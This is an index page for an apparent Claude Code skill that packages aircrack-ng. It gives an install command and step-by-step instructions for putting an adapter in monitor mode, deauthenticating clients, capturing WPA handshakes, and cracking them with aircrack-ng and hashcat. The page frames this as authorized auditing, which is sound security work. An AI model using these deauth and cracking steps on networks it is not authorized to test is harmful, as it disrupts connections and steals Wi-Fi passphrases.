OpenSkillIndex← back to search
claude-code

Skills aircrack-ng

install
source · Clone the upstream repo
git clone https://github.com/TerminalSkills/skills
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/TerminalSkills/skills "$T" && mkdir -p ~/.claude/skills && cp -r "$T/skills/aircrack-ng" ~/.claude/skills/terminalskills-skills-aircrack-ng && rm -rf "$T"
manifest: skills/aircrack-ng/SKILL.md
safety · automated scan (low risk)
This is a pattern-based risk scan, not a security review. Our crawler flagged:
  • uses sudo
Always read a skill's source content before installing. Patterns alone don't mean the skill is malicious — but they warrant attention.
source content

Aircrack-ng

Overview

Aircrack-ng is the reference suite for 802.11 security auditing. It captures wireless frames in monitor mode, extracts WPA/WPA2 4-way handshakes, and performs offline dictionary attacks against the captured handshake. The suite is 

airmon-ng
(monitor mode), 
airodump-ng
(capture), 
aireplay-ng
(injection/deauth), and 
aircrack-ng
(offline crack). Use exclusively on networks you own or have written permission to audit.

Instructions

Step 1: Put the Adapter in Monitor Mode

# Check which adapters support monitor mode and injection
sudo airmon-ng
# PHY     Interface       Driver          Chipset
# phy0    wlan0           ath9k_htc       Atheros AR9271

# Kill processes that interfere with monitor mode
sudo airmon-ng check kill

# Enable monitor mode — wlan0 becomes wlan0mon
sudo airmon-ng start wlan0

# Verify
iw dev wlan0mon info | grep type
# type monitor

Step 2: Scan Nearby Networks

# Scan all 2.4 and 5 GHz channels
sudo airodump-ng wlan0mon
# Columns: BSSID, PWR, Beacons, #Data, CH, ENC, CIPHER, AUTH, ESSID
# Note the BSSID and channel of your target network

# Filter to a specific channel and BSSID
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon
# -w handshake: write pcap files prefixed "handshake"
# Keep this running — it logs clients connecting to the AP

Step 3: Capture a WPA Handshake

# Option A: passive — wait for a client to authenticate
# airodump shows "WPA handshake: AA:BB:CC:DD:EE:FF" in the top-right when captured

# Option B: active — deauth an existing client to force reconnection
# (only on networks you own or have authorization for)
sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon
# -a: AP BSSID   -c: client MAC (from airodump station list)
# 5 deauth packets is usually enough; don't flood.

# Confirm the handshake is in the capture
aircrack-ng handshake-01.cap
# Look for: "1 handshake" next to the target BSSID

Step 4: Crack the Handshake Offline

# Dictionary attack with rockyou
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap
# KEY FOUND! [ correcthorsebattery ]

# With a rule-transformed wordlist (via john)
john --wordlist=rockyou.txt --rules=KoreLogic --stdout \
  | aircrack-ng -w - -b AA:BB:CC:DD:EE:FF handshake-01.cap

# Convert to hashcat format for GPU cracking (much faster)
hcxpcapngtool -o hash.hc22000 handshake-01.cap
hashcat -m 22000 hash.hc22000 rockyou.txt

Step 5: Clean Up

# Stop monitor mode and restore managed mode
sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager
iw dev
# Should show wlan0 back in managed mode

Examples

Example 1: Audit Your Own Home Network

# Authorization: it's your network. Still, snapshot settings so you can recover.

sudo airmon-ng check kill
sudo airmon-ng start wlan0

# Locate your AP
sudo airodump-ng wlan0mon
# Press Ctrl+C after you see your SSID on, say, channel 6, BSSID CC:... 

# Capture targeted
mkdir -p ~/audit && cd ~/audit
sudo airodump-ng -c 6 --bssid CC:CC:CC:CC:CC:CC -w home wlan0mon &

# Reconnect a device (phone Wi-Fi off/on) to produce the handshake naturally
# Stop airodump once you see "WPA handshake" in the header

# Attempt to crack with a personal wordlist + rockyou
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b CC:CC:CC:CC:CC:CC home-01.cap

# If it cracks quickly → your passphrase is weak, change it.
sudo airmon-ng stop wlan0mon

Example 2: GPU-Accelerated Cracking with Hashcat

# Convert the capture to hashcat 22000 format (replaces older -m 2500)
sudo apt install hcxtools
hcxpcapngtool -o corporate.hc22000 corporate-01.cap

# Verify the essid/mac
cat corporate.hc22000 | head

# Run hashcat with a strong wordlist + best64 rules
hashcat -m 22000 corporate.hc22000 \
  /usr/share/wordlists/rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule \
  --status --status-timer=10

# Retrieve the recovered passphrase
hashcat -m 22000 corporate.hc22000 --show

Guidelines

  • Written authorization is mandatory. Capturing or cracking a neighbor's Wi-Fi is a crime. Only audit your own networks or those covered by an engagement scope.
  • Not every adapter supports monitor mode and injection. Proven chipsets: Atheros AR9271, Ralink RT3070, MediaTek MT7612U, Realtek RTL8812AU.
  • Start with 
    airmon-ng check kill
    . NetworkManager will otherwise fight you for control of the interface.
  • Deauth attacks are noisy and disruptive — use the minimum count (
    --deauth 3-5
    ) and target a single client, never the broadcast address.
  • Only the WPA 4-way handshake is required for offline cracking; longer captures waste disk space.
  • For modern networks, convert the capture to 
    .hc22000
    and crack on a GPU with hashcat — CPU aircrack-ng is an order of magnitude slower.
  • WPA3 SAE is not vulnerable to the classic offline handshake attack; aircrack-ng is for WPA/WPA2-PSK.
  • Tear down monitor mode after the engagement so the host doesn't leak frames in routine use.